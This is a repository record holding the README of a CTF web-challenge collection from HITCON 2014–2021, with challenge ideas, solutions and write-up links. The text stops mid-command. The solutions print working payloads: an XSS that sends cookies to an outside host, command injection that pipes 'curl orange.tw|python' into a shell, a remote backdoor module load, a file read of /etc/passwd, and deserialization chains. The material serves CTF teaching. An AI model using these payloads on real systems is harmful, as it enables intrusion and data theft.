{"id":13538487,"url":"https://github.com/orangetw/my-ctf-web-challenges","last_synced_at":"2025-04-14T05:18:57.848Z","repository":{"id":47606812,"uuid":"70726575","full_name":"orangetw/My-CTF-Web-Challenges","owner":"orangetw","description":"Collection of CTF Web challenges I made","archived":false,"fork":false,"pushed_at":"2023-11-08T09:07:46.000Z","size":61923,"stargazers_count":2719,"open_issues_count":4,"forks_count":480,"subscribers_count":139,"default_branch":"master","last_synced_at":"2025-04-14T05:18:48.929Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/orangetw.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-10-12T17:57:17.000Z","updated_at":"2025-04-11T14:33:53.000Z","dependencies_parsed_at":"2024-08-01T09:37:37.081Z","dependency_job_id":null,"html_url":"https://github.com/orangetw/My-CTF-Web-Challenges","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orangetw%2FMy-CTF-Web-Challenges","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orangetw%2FMy-CTF-Web-Challenges/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orangetw%2FMy-CTF-Web-Challenges/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orangetw%2FMy-CTF-Web-Challenges/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/orangetw","download_url"
:"https://codeload.github.com/orangetw/My-CTF-Web-Challenges/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248824693,"owners_count":21167345,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:12.625Z","updated_at":"2025-04-14T05:18:57.822Z","avatar_url":"https://github.com/orangetw.png","language":"PHP","funding_links":[],"categories":["\u003ca id=\"c7f35432806520669b15a28161a4d26a\"\u003e\u003c/a\u003eCTF\u0026\u0026HTB","\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":["\u003ca id=\"30c4df38bcd1abaaaac13ffda7d206c6\"\u003e\u003c/a\u003e收集"],"readme":"\n# My CTF Web Challenges\n\nThis is the repository of all CTF challenges I made, including the source code, write-up and idea explanation!\nHope you like it :)  \n\n\n**P.s.** BTW, the `Babyfirst` series and `One Line PHP Challenge` are my favorite challenges. 
If you don't have much time, please at least look at those!\n\n* [Babyfirst](#babyfirst)  \n* [Babyfirst Revenge](#babyfirst-revenge)  \n* [Babyfirst Revenge v2](#babyfirst-revenge-v2)  \n* [One Line PHP Challenge](#one-line-php-challenge)  \n\n\u003cbr\u003e\n\nAnd you can find me via:  \n* Email: orange@chroot.org   \n* Blog: [http://blog.orange.tw](http://blog.orange.tw/)   \n* Twitter: [@orange_8361](https://twitter.com/orange_8361)  \n\n\u003cbr\u003e\n\n\n## **Table of Contents**\n\n* [HITCON 2021](#W3rmup-PHP)\n    * [W3rmup PHP](#W3rmup-PHP)\n    * [One-Bit Man](#One-Bit-Man)\n    * [Metamon Verse](#Metamon-Verse)\n    * [FBI Warning](#FBI-Warning)\n    * [Vulpixelize](#Vulpixelize)\n\n* [HITCON 2020](#oShell)\n    * [oShell](#oShell)\n    * [oStyle](#oStyle)\n    * [Return of Use-After-Flee](#return-of-use-after-flee)\n\n* [HITCON 2019 Quals](#virtual-public-network)\n    * [Virtual Public Network](#virtual-public-network)\n    * [Bounty Pl33z](#bounty-pl33z)\n    * [GoGo PowerSQL](#gogo-powersql)\n    * [Luatic](#luatic)\n    * [Buggy .Net](#buggy-net)  \n\n* [HITCON 2018](#one-line-php-challenge)\n    * [One Line PHP Challenge](#one-line-php-challenge)\n    * [Baby Cake](#baby-cake)\n    * [Oh My Raddit](#oh-my-raddit)\n    * [Oh My Raddit v2](#oh-my-raddit-v2)\n    * [Why so Serials?](#why-so-serials)  \n\n* [HITCON 2017 Quals](#babyfirst-revenge)\n    * [BabyFirst Revenge](#babyfirst-revenge)\n    * [BabyFirst Revenge v2](#babyfirst-revenge-v2)\n    * [SSRFme?](#ssrfme)\n    * [SQL so Hard](#sql-so-hard)\n    * [Baby^H Master PHP 2017](#babyh-master-php-2017)  \n\n* [HITCON 2016 Quals](#papapa)\n    * [%%%](#papapa)\n    * [Leaking](#leaking)\n    * [BabyTrick](#babytrick)\n    * [Angry Boy](#angry-boy)\n    * [Angry Seam](#angry-seam)  \n    \n* [HITCON 2015 Quals](#babyfirst)  \n    * [Babyfirst](#babyfirst)\n    * [nanana](#nanana)\n    * [Giraffe's Coffee](#giraffes-coffee)\n    * [lalala](#lalala)\n    * [Use-After-FLEE](#use-after-flee)\n    \n* 
[HITCON 2014 Quals](#pushincat)\n    * [PUSHIN CAT](#pushincat)\n    * [PY4H4SHER](#py4h4sher)\n    * [LEENODE](#leenode)\n    \n* [WCTF 2016](#blackbox)  \n    * [BlackBox](#blackbox)\n\n* [AIS3 Final 2015 Final](#sqlpwn)\n    * [SQLPWN](#sqlpwn)\n    \n\u003cbr\u003e\n\n## **W3rmup PHP**\n  \nDifficulty: **★★**  \nSolved: **22 / 666**  \nTag:   **PHP**, **Code Review**, **YAML**, **Command Injection**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/W3rmup-PHP/)  \n\n#### Idea\n\n* [The Norway Problem](https://hitchdev.com/strictyaml/why/implicit-typing-removed/): the country code of Norway (NO) becomes `False` in YAML\n* Bypass `escapeshellarg` via the logic problem between `count()` and `unset()`  \n\n#### Solution\n\n* TBD\n\n#### Write Ups\n\n* TBD\n\n\n## **One-Bit Man**\n  \nDifficulty: **★**  \nSolved: **49 / 666**  \nTag:   **PHP**, **Code Review**\n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/One-Bit-Man/)  \n\n#### Idea\n\nYou can flip one bit in any file of the latest WordPress version, and you have to pwn the server.\n\n#### Solution\n\nFlip one bit at position `5389` of the file `/var/www/html/wp-includes/user.php` to NOP out the NOT (`!`) operation.\n\n```php\n    if ( ! wp_check_password( $password, $user-\u003euser_pass, $user-\u003eID ) ) {\n            return new WP_Error(\n```\n\n#### Write Ups\n\n* TBD\n\n\n\n## **Metamon Verse**\n  \nDifficulty: **★★★☆**  \nSolved: **9 / 666**  \nTag:   **NFS**, **SSRF**, **RCE**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/Metamon-Verse/)  \n\n#### Idea\n\nThe idea is to use the SSRF to talk to the local NFS/RPC server and get RCE. To complete the exploit, you have to:\n\n1. Construct the `RPC/PORTMAP_CALL` packet and send it to `gopher://127.0.0.1:111/` to get the port of the `mountd` service.\n2. Construct the `RPC/MNT_CALL` packet and send it to `gopher://127.0.0.1:\u003cmnt-port\u003e/` to get the file handle of the `/data` volume (remember to specify `CURLOPT_LOCALPORT` to bypass the authentication)\n3. 
Construct the `RPC/NFS_CALL` packet and send it to `gopher://127.0.0.1:2049/` to create a SYMLINK (remember to specify `CURLOPT_LOCALPORT` to bypass the authentication)\n4. Symlink `/app/templates/index.html` to a controllable file to get SSTI and then RCE!\n\n#### Solution\n\nA dirty exploit can be found [here](https://gist.github.com/orangetw/6d34ff98a6332bc0523b35ea952a790d)\n\n#### Write Ups\n\n* TBD\n\n\n## **FBI Warning**\n  \nDifficulty: **☆**  \nSolved: **25 / 666**  \nTag:   **MISC**, **OSINT**, **PHP**, **Code Review**\n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/FBI-Warning/)  \n\n#### Idea\n\nThe website uses the famous message board project [futaba-ng](https://github.com/futoase/futaba-ng), and its ID generation is based on `REMOTE_ADDR`:\n\n```php\ndefine(\"IDSEED\", 'idの種');       // seed for the ID\n...\n$now.=\" ID:\".substr(crypt(md5($_SERVER[\"REMOTE_ADDR\"].IDSEED.gmdate(\"Ymd\", $time+9*60*60)),'id'),-8);\n```\n\n#### Solution\n\nBecause of the known IP prefix, you can identify the IP address of Ωrange by brute force easily.\n\n```php\nvar_dump( substr(crypt(md5(\"219.91.64.47\".\"idの種\".\"20211203\"),\"id\"),-8) == \"ueyUrcwA\" );\n// bool(true)\n```\n\n#### Write Ups\n\n* TBD\n\n\n\n## **Vulpixelize**\n  \nDifficulty: **★☆**  \nSolved: **41 / 666**  \nTag:   **Browser**, **Feature**\n\n#### Source Code\n\n* [Source](hitcon-ctf-2021/Vulpixelize/)\n\n#### Idea\n\nUse the new Chrome feature [Text Fragments](https://wicg.github.io/scroll-to-text-fragment/) to extract the flag.\n\n\n#### Solution\n\n* TBD\n\n#### Write Ups\n\n* TBD\n\n\n\n\n\n## **oShell**\n  \nDifficulty: **★★**  \nSolved: **21 / 1281**  \nTag:   **BlackBox**, **Shell**, **Command Injection**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2020/oShell/)  \n\n#### Solution\n\n1. Leveraging `strace` in `htop` to read the enable secret.\n2. Writing `/home/oShell/.toprc` with `tcpdump -w`\n3. 
Abusing the `top` inspect feature to run arbitrary commands\n\n\n#### Write Ups\n\n* [Writeup from team FrenchRoomba](https://github.com/FrenchRoomba/ctf-writeup-HITCON-CTF-2020/tree/master/oShell)  \n\n\n## **oStyle**\n  \nDifficulty: **★★☆**  \nSolved: **10 / 1281**  \nTag:   **XSS**\n\n#### Source Code\n\n* [Source](hitcon-ctf-2020/oStyle/)  \n\n#### Solution\n\n* The default Apache installation enables `mod_negotiation`, which allows `.var` type maps, and you can specify an arbitrary content-type there.\n\n**test.var**\n```\nContent-language: en\nContent-type: text/html\nBody:----foo----\n\n\u003cscript\u003e\nfetch('http://orange.tw/?' + escape(document.cookie))\n\u003c/script\u003e\n\n----foo----\n\n```\n\n\n#### Write Ups\n\n* TBD\n\n\n## **Return of Use-After-Flee**\n  \nDifficulty: **★★★★★**  \nSolved: **0 / 1281**  \nTag: **WhiteBox**, **PHP**, **UAF**, **PWN**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2020/Return-of-Use-After-Flee/)  \n\n#### Solution\n\n* Exploiting `CVE-2015-0273` to pop a shell without known binaries. 
More details will be published on [my blog](http://blog.orange.tw/) soon.\n\n\n#### Write Ups\n\n* TBD\n\n\n\n## **Virtual Public Network**\n  \nDifficulty: **★☆**  \nSolved: **81 / 1147**  \nTag:   **WhiteBox**, **Perl**, **Command Injection**  \n\n#### Source Code\n\n* [Source](hitcon-ctf-2019/virtual-public-network/)  \n\n#### Solution\n\n* Refer to my blog and my Black Hat USA 2019 slides for details\n    * [Attacking SSL VPN - Part 3: The Golden Pulse Secure SSL VPN RCE Chain, with Twitter as Case Study!](https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html)\n    * [Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf)  \n\n```\nhttp://13.231.137.9/cgi-bin/diag.cgi\n?options=-r@a=\"ls -alh /\",system@a%23 2\u003etmp/orange.thtml \u003c\n\u0026tpl=orange\n```\n\n\n#### Write Ups\n\n* TBD\n\n\n## **Bounty Pl33z**\n  \nDifficulty: **★★★☆**  \nSolved: **30 / 1147**  \nTag:   **XSS**\n\n#### Source Code\n\n* [Website](hitcon-ctf-2019/bounty-pl33z/www/)  \n* [XSS bot](hitcon-ctf-2019/bounty-pl33z/bot/)  \n\n#### Solution\n\n* Idea from [@FD](https://twitter.com/filedescriptor): a little-known JavaScript comment style, [SingleLineHTMLOpenComment](https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-SingleLineHTMLOpenComment) and [HTMLCloseComment](https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-HTMLCloseComment) in the ECMA specification. 
\n\nHere we use Unicode `U+2028` and `U+3002` to bypass the `\\n` and `.` filters.\n\n```\nhttp://3.114.5.202/fd.php\n?q=ssl。orange。tw?xx\"%2bdocument[`cookie`]%E2%80%A8--\u003e\n```\n\n#### Unintended Solution\n\n* Nesting template expressions\n\n```\nhttp://3.114.5.202/fd.php\n?q=ssl。orange。tw?`%2b\"%2bdocument[`cookie`];(`${`\n```\n\n#### Write Ups\n\n* TBD\n\n## **GoGo PowerSQL**\n  \nDifficulty: **★★★☆**  \nSolved: **16 / 1147**  \nTag:   **Environment Injection**, **MySQL Client Attack**\n\n#### Source Code\n\n* [Docker](hitcon-ctf-2019/gogo-powersql/)  \n\n#### Solution\n\n1. Buffer overflow `DB_HOST` in the BSS\n2. Due to the [patch](hitcon-ctf-2019/gogo-powersql/Dockerfile#L20), we can pollute environment variables that are not in the [Blacklist](https://github.com/embedthis/goahead/blob/v4.0.0/src/cgi.c#L170).\n3. Hijack the MySQL connection via environment variables such as `LOCALDOMAIN` or `HOSTALIASES`\n4. Read `/FLAG` via `LOAD DATA LOCAL INFILE`.\n\n```python\nimport requests\n\n# padding parameters overflow DB_HOST in the BSS (step 1), then HOSTALIASES\n# is smuggled into the environment past the blacklist (steps 2 and 3)\npayload = ['x=x' for x in range(254)]\npayload.append('name=x')\npayload.append('HOSTALIASES=/proc/self/fd/0')\npayload.append('orangeeeee=go')\npayload = '\u0026'.join(payload)\n\n# the POST body is read back through /proc/self/fd/0 as the host aliases file\ndata = 'orangeeeee my.orange.tw'\n\nr = requests.post('http://13.231.38.172/cgi-bin/query?'+payload, data=data)\nprint(r.content)\n```\n\n```shell\n$ git clone https://github.com/lcark/MysqlClientAttack.git\n$ cd MysqlClientAttack\n$ python main.py -F /FLAG\n```\n\n\n\n#### Write Ups\n\n* TBD\n\n## **Luatic**\n  \nDifficulty: **★★☆**  \nSolved: **42 / 1147**  \nTag:   **WhiteBox**, **Redis**, **Lua**\n\n#### Source Code\n\n* [Docker](hitcon-ctf-2019/luatic/)  \n\n#### Solution\n\n1. Override PHP global variables.\n2. 
Redis [implements](https://github.com/antirez/redis/blob/ee1cef189fff604f165b2d20a307545840de944e/src/scripting.c#L1363) the `eval` command by string concatenation, so we can escape the original Lua function and override global objects.\n\n```\nhttp://54.250.242.183/luatic.php\n?_POST[TEST_KEY]=return 1 end function math:random() return 2\n\u0026_POST[TEST_VALUE]=0\n\u0026_POST[MY_SET_COMMAND]=eval\n\u0026_POST[token]=\u003ctoken\u003e\n\u0026_POST[guess]=2\n```\n\n```\nhttp://54.250.242.183/luatic.php\n?_POST[token]=\u003ctoken\u003e\n\u0026_POST[guess]=2\n```\n\n#### Unintended Solution\n\n* Lua is so magical that there are several unintended solutions. Sorry for the imperfect challenge :(\n\n#### Write Ups\n\n* TBD\n\n## **Buggy .Net**\n  \nDifficulty: **★☆**  \nSolved: **13 / 1147**  \nTag:   **ASP.NET**, **WhiteBox**\n\n#### Source Code\n\n* [Default.aspx](hitcon-ctf-2019/buggy-net/Default.aspx)  \n\n#### Solution\n\n* Use .NET request validation to trigger an exception and bypass the filter\n* Idea from [Soroush Dalili](https://twitter.com/irsdl)'s [WAF Bypass Techniques - Using HTTP Standard and Web Servers' Behaviour](https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour) at AppSec Europe 2018 (p30~p34)  \n\n```\nGET / HTTP/1.1\nHost: buggy\nContent-Type: application/x-www-form-urlencoded; charset=ibm500\nContent-Length: 61\n\n%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3\u0026x=L%A7n\n```\n\n```python\nfrom urllib.parse import quote\n\n# EBCDIC-encode each field (charset=ibm500) and percent-encode the raw bytes\ns = lambda x: quote(x.encode('ibm500'))\nprint('%s=%s\u0026x=%s' % (s('filename'), s('../../FLAG.txt'), s('\u003cx\u003e')))\n```\n\n#### Write Ups\n\n* TBD\n\n\n## **One Line PHP Challenge**\n  \nDifficulty: **★★★★**  \nSolved: **3 / 1816**  \nTag:   **PHP**\n\n#### Source Code\n\n* [index.php](hitcon-ctf-2018/one-line-php-challenge/src/index.php)  \n\n#### Solution\n\nP.S. This is a default PHP 7.2 + Apache installation on Ubuntu 18.04\n\n1. 
Control part of the session file content via `PHP_SESSION_UPLOAD_PROGRESS`\n2. Bypass `session.upload_progress.cleanup = On` with a `race condition` or a `slow query`\n3. Control the prefix to `@\u003c?php` by chaining PHP wrappers\n\n* [exp_for_php.py](hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py)\n* [Official writeup for One Line PHP Challenge](http://blog.orange.tw/2018/10/hitcon-ctf-2018-one-line-php-challenge.html)  \n\n#### Write Ups\n\n* [(English) One Line PHP Challenge](https://hackmd.io/s/B1A2JIjjm)  \n* [(Chinese) One Line PHP Challenge](https://hackmd.io/s/SkxOwAqiQ)  \n* [hitcon2018 One Line PHP Challenge](https://www.kingkk.com/2018/10/hitcon2018-One-Line-PHP-Challenge/)  \n* [HITCON 2018 suffering notes 1: studying one-line-php-challenge](http://wonderkun.cc/index.html/?p=718)  \n\n## **Baby Cake**\n  \nDifficulty: **★★★**  \nSolved: **4 / 1816**  \nTag:   **Code Review**, **PHP**, **De-serialization**\n\n#### Source Code\n\n* [index.php](hitcon-ctf-2018/baby-cake/baby_cake.tgz)  \n\n#### Solution\n\nDue to the implementation of **`CURLOPT_SAFE_UPLOAD`** in CakePHP's `FormData.php`, we can read arbitrary files!\n\n```sh\n# arbitrary file read; listen on port 12345 on your server\nhttp://13.230.134.135/\n?url=http://your_ip:12345/\n\u0026data[x]=@/etc/passwd\n\n# arbitrary de-serialization via the Monolog POP chain\nhttp://13.230.134.135/\n?url=http://your_ip:12345/\n\u0026data[x]=@phar://../tmp/cache/mycache/[your_ip]/[md5_of_url]/body.cache\n```\n\n* [exploit.phar](hitcon-ctf-2018/baby-cake/exploit.phar)\n\n#### Write Ups\n\n* [Baby Cake](https://github.com/PDKT-Team/ctf/tree/master/hitcon2018/baby-cake)  \n* [HITCON 2018 Web - Oh My Raddit / Baby Cake write-up](https://xz.aliyun.com/t/2961)  \n* [HITCON CTF 2018 Web WP: Baby Cake](https://xz.aliyun.com/t/3035)  \n\n## **Oh My Raddit**\n  \nDifficulty: **★★☆**  \nSolved: **27 / 1816**  \nTag:   **Observation**, **DES checksum**, **Crypto**, **Web**\n\n#### Source Code\n\n* [app](hitcon-ctf-2018/oh-my-raddit/src/)  \n\n#### Solution\n\n1. 
Identify `ECB` mode from block frequency analysis\n2. Infer `block size = 8` from the ciphertext length\n3. From the information above, `DES` is the reasonable real-world guess\n4. The most common block is `3ca92540eb2d0a42` (always at the end of the ciphertext). We can guess it's the padding `\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08`\n5. Due to the parity check in [DES](https://en.wikipedia.org/wiki/Data_Encryption_Standard), we can reduce the keyspace from 26 (`abcdefghijklmnopqrstuvwxyz`) to 13 (`acegikmoqsuwy`)\n    * Break it in 1 second with `HashCat`\n    * Break it in 10 minutes with single-threaded Python\n\n#### Write Ups\n\n* [Oh My Raddit](https://github.com/pwning/public-writeup/blob/e818115a2c3a5d18e8191d37b5c3151823d43126/hitcon2018/oh-my-raddit/README.md)  \n* [Oh my raddit](https://github.com/mdsnins/ctf-writeups/blob/b292621463b156d864bd2db062f31afe9aacb8d6/HITCON%202018/Oh%20my%20raddit.md)\n* [2018HITCON-Oh My Raddit\u0026v2 write-up](https://mochazz.github.io/2018/10/25/2018HITCON-Oh%20My%20Raddit\u0026v2%E9%A2%98%E8%A7%A3/)  \n\n## **Oh My Raddit v2**\n  \nDifficulty: **★★**  \nSolved: **10 / 1816**  \nTag:   **Web.py**, **SQL Injection to RCE**\n\n#### Source Code\n\n* [app](hitcon-ctf-2018/oh-my-raddit/src/)  \n\n#### Solution\n\n* Read the package version from `requirements.txt`\n* [Remote Code Execution in Web.py framework](https://securityetalii.es/2014/11/08/remote-code-execution-in-web-py-framework/)\n\n* [exp.py](hitcon-ctf-2018/oh-my-raddit/exp.py)\n\n#### Write Ups\n\n* [Oh My Raddit V2](https://github.com/pwning/public-writeup/blob/c7273a8bd01710da0f2d9d9a3c8abe473b76bfde/hitcon2018/ohmyradditv2/README.md)\n* [Oh My Raddit v2](https://ctftime.org/writeup/11931)  \n* [2018HITCON-Oh My Raddit\u0026v2 write-up](https://mochazz.github.io/2018/10/25/2018HITCON-Oh%20My%20Raddit\u0026v2%E9%A2%98%E8%A7%A3/)  \n\n## **Why so Serials?**\n  \nDifficulty: **★★★★**  \nSolved: **1 / 1816**  \nTag:   **De-serialization**, **RCE**, **ASP.NET**, **View State**\n\n#### Source Code\n\n* 
[Default.aspx](hitcon-ctf-2018/why-so-serials/src/Default.aspx)  \n\n#### Solution\n\n1. Get the `machineKey` from `web.config` via Server-Side Includes (`.shtml` or `.stm`)\n2. Exploit the `ASP.NET` `__VIEWSTATE` with [ysoserial.net](https://github.com/pwntester/ysoserial.net)\n\n#### Write Ups\n\n* [HITCON 2018: Why so Serials? Write-up](https://cyku.tw/ctf-hitcon-2018-why-so-serials/)  \n* [HITCON CTF 2018 - Why so Serials? Writeup](https://xz.aliyun.com/t/3019)  \n\n\n## **BabyFirst Revenge**\n  \nDifficulty: **★☆**  \nSolved: **95 / 1541**  \nTag:  **WhiteBox**, **PHP**, **Command Injection**  \n\n#### Idea\n\n* Command injection, but in only **5** bytes  \n\n#### Source Code\n\n* [index.php](hitcon-ctf-2017/babyfirst-revenge/index.php)  \n\n#### Solution\n\n```bash\n# write `ls -t\u003eg` into the file \"_\"\nhttp://host/?cmd=\u003els\\\nhttp://host/?cmd=ls\u003e_\nhttp://host/?cmd=\u003e\\ \\\nhttp://host/?cmd=\u003e-t\\\nhttp://host/?cmd=\u003e\\\u003eg\nhttp://host/?cmd=ls\u003e\u003e_\n\n# write `curl orange.tw|python` into the file \"g\"\nhttp://host/?cmd=\u003eon\nhttp://host/?cmd=\u003eth\\\nhttp://host/?cmd=\u003epy\\\nhttp://host/?cmd=\u003e\\|\\\nhttp://host/?cmd=\u003etw\\\nhttp://host/?cmd=\u003ee.\\\nhttp://host/?cmd=\u003eng\\\nhttp://host/?cmd=\u003era\\\nhttp://host/?cmd=\u003eo\\\nhttp://host/?cmd=\u003e\\ \\\nhttp://host/?cmd=\u003erl\\\nhttp://host/?cmd=\u003ecu\\\nhttp://host/?cmd=sh _\n\n# got shell\nhttp://host/?cmd=sh g\n```\n\nYou can check [exploit.py](hitcon-ctf-2017/babyfirst-revenge/exploit.py) for the details! 
There are also lots of creative solutions; you can check the write-ups below.\n\n\n#### Write Ups\n\n* [HITCON CTF 2017-BabyFirst Revenge-writeup](https://chybeta.github.io/2017/11/04/HITCON-CTF-2017-BabyFirst-Revenge-writeup/)  \n* [HITCON CTF 2017-BabyFirst Revenge-writeup (Via curl)](http://www.jianshu.com/p/82788b6949c7)  \n* [HITCON 2017 CTF BabyFirst Revenge](https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/)  \n* [HITCON CTF 2017 - BabyFirst Revenge (172 pts.)](https://kimtruth.github.io/2017/11/06/HITCON-CTF-2017-BabyFirst-Revenge-172-pts/)  \n* [Hitcon CTF 2017 - Baby Revenge](https://theromanxpl0it.github.io/ctf_hitcon2017/babyrevenge/)  \n* [Hitcon CTF 2017 Quals: Baby First Revenge (web 172) (Via xxd)](https://losfuzzys.github.io/writeup/2017/11/06/hitconctf-babyfirstrevenge/)  \n* [HITCON CTF 2017 BabyFirst Revenge \u0026 v2 writeup](https://findneo.github.io/2017/11/HITCON-CTF-2017-Babyfirst-Revenge-series-writeup/)  \n* [BabyFirst-Revenge-HITCOIN-2017-QUALS by @n4p5ter](https://github.com/n4p5ter/BabyFirst-Revenge-HITCOIN-2017-QUALS)  \n\n\n\n## **BabyFirst Revenge v2**\n  \nDifficulty: **★★★★**  \nSolved: **8 / 1541**  \nTag:  **WhiteBox**, **PHP**, **Command Injection**  \n\n#### Idea\n\n* Command injection, but in only **4** bytes  \n\n#### Source Code\n\n* [index.php](hitcon-ctf-2017/babyfirst-revenge-v2/index.php)  \n\n#### Solution\n\n1. Generate `g\u003e ht- sl` into file `v`\n2. Reverse file `v` into file `x`\n3. Generate `curl orange.tw|python;`\n4. Execute `x` (which runs `ls -th \u003eg`)\n5. 
Execute `g`\n\nYou can check [exploit.py](hitcon-ctf-2017/babyfirst-revenge-v2/exploit.py) for the details!\n\n\n#### Write Ups\n\n* [Baby First Revenge v2 (Via vim) by @bennofs](https://github.com/bennofs/docs/blob/master/hitcon-2017/baby-first-revenge2.md)  \n* [\\[python\\] baby-exp.py](https://codegists.com/snippet/python/baby-exppy_beched_python)  \n* [How to solve a CTF challenge for $20 - HITCON 2017 BabyFirst Revenge v2](https://www.eugenekolo.com/blog/hitcon-babyfirst-revenge-v2/)  \n* [HITCON CTF 2017 BabyFirst Revenge \u0026 v2 writeup](https://findneo.github.io/2017/11/HITCON-CTF-2017-Babyfirst-Revenge-series-writeup/)  \n\n\n\n## **SSRFme?**\n  \nDifficulty: **★★☆**  \nSolved: **20 / 1541**  \nTag:  **WhiteBox**, **Perl**, **PATH Pollution**  \n\n#### Idea\n\n* [CVE-2016-1238](https://perl5.git.perl.org/perl.git/commit/cee96d52c39b1e7b36e1c62d38bcd8d86e9a41ab) (but the latest Ubuntu 17.04 image on AWS is still vulnerable)  \n* Perl looks in the current directory when importing modules  \n* The Perl module [URI/lib/URI.pm#L136](https://github.com/libwww-perl/URI/blob/b7680860f323a0cf3ffe5f6bdb684646e1ecac33/lib/URI.pm#L136) will `eval` if there is an unknown scheme\n\n#### Source Code\n\n* [index.php](hitcon-ctf-2017/ssrfme/index.php)  \n\n```bash\n$ sudo apt install libwww-perl\n```\n\n#### Solution\n\n```bash\n# write the evil URI module into the current directory\n$ curl 'http://host/?filename=URI/orange.pm\u0026url=http://orange.tw/w/backdoor.pl'\n\n# eval the evil module `orange`\n$ curl 'http://host/?filename=xxx\u0026url=orange://orange.tw'\n```\n\n#### Write Ups\n\n* [Another Solution by @Paul_Axe](https://twitter.com/Paul_Axe/status/927669724439293953)  \n* [HITCON 2017 SSRFme](https://ricterz.me/posts/HITCON%202017%20SSRFme)  \n* [SSRFme by @sorgloomer](https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/ssrfme.md)  \n\n\n\n## **SQL so Hard**\n  \nDifficulty: **★★★**  \nSolved: **10 / 1541**  \nTag:  **WhiteBox**, **MySQL**, **PostgreSQL**, 
**SQL Injection**, **Code Injection**  \n\n#### Idea\n\n* MySQL `max_allowed_packet` drops oversized SQL statements  \n* [Node-Postgres - code execution vulnerability](https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)  \n* Exploit the RCE through SQL `UPDATE` syntax\n\n#### Source Code\n\n* [app.js](hitcon-ctf-2017/sql-so-hard/app.js)  \n\n#### Solution\n\n* [exploit.py](hitcon-ctf-2017/sql-so-hard/exploit.py)  \n\n#### Write Ups\n\n* [SQL so Hard by @sorgloomer](https://github.com/sorgloomer/writeups/blob/master/writeups/2017-hitcon-quals/sql-so-hard.md)  \n\n\n## **Baby^H Master PHP 2017**\n  \nDifficulty: **★★★★☆**  \nSolved: **0 / 1541**  \nTag:  **WhiteBox**, **PHP**, **Serialization**, **Apache Prefork**  \n\n#### Idea\n\n* PHP performs de-serialization when parsing `PHAR` files\n* PHP assigns a predictable function name `\\x00lambda_%d` to anonymous functions  \n* Break shared VARIABLE state in Apache Pre-fork mode\n\n#### Source Code\n\n* [index.php](hitcon-ctf-2017/baby^h-master-php-2017/index.php)  \n\n#### Solution\n\n```bash\n# get a cookie\n$ curl http://host/ --cookie-jar cookie\n\n# download the .phar file from http://orange.tw/avatar.gif\n$ curl -b cookie 'http://host/?m=upload\u0026url=http://orange.tw/'\n\n# force apache to fork a new process\n$ python fork.py \u0026\n\n# get the flag\n$ curl -b cookie \"http://host/?m=upload\u0026url=phar:///var/www/data/$MD5_IP/\u0026lucky=%00lambda_1\"\n```\n\n* [avatar.gif](hitcon-ctf-2017/baby^h-master-php-2017/avatar.gif)  \n* [fork.py](hitcon-ctf-2017/baby^h-master-php-2017/fork.py)\n\n#### Write Ups\n\n* [By default: file read =\u003e unserialize!](https://rdot.org/forum/showthread.php?t=4379)  \n\n\n\n## **papapa**\n  \nDifficulty: **★**  \nSolved: **71 / 1024**  \nTag:  **BlackBox**, **SSL**, **Pentesting**  \n\n#### Idea\n\n* Leak the internal hostname from the SSL certificate  \n\n#### Source Code\n\n* [here](hitcon-ctf-2016/papapa)  \n\n#### Solution\n\n```bash\n# read the Subject Alternative Name from the server certificate\n$ openssl s_client 
